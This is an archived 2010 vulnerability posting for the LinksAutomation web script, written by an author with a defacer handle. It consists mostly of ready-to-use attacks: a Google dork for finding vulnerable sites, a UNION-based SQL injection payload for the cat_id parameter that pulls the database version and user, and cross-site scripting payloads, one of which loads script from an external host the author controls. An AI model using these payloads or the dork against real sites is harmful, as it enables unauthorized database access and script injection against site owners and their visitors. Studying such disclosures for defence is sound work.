LinksAutomation Multiple Remote Vulnerabilities

2010-05-17T00:00:00
ID SECURITYVULNS:DOC:23872
Type securityvulns
Reporter Securityvulns
Modified 2010-05-17T00:00:00

Description

----------------In The Name Of God------------

LinksAutomation Multiple Remote Vulnerabilities

AUTHOR: md.r00t

Mail: md.r00t.defacer@gmail.com

Website: www.r00t.gigfa.com

Google D0rk:

"Powered By LinksAutomation"

Sql Injection:

---------

Exploit= -999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(@@version,0x3a,0x3e,user()),16,17,18--

http://www.Site.com/links.php?cat_id=[Exploit]

Xss:

<script>alert(/By md.r00t/)</script>

<script src=http://md-r00t.persiangig.com/xpl/XSS.JS></script>

-------------

http://www.Site.com/links.php?cat_id=28&cat_name=[Xss]

TNX:

Aria-Security Team (Persian Security Network),Virangar Security Team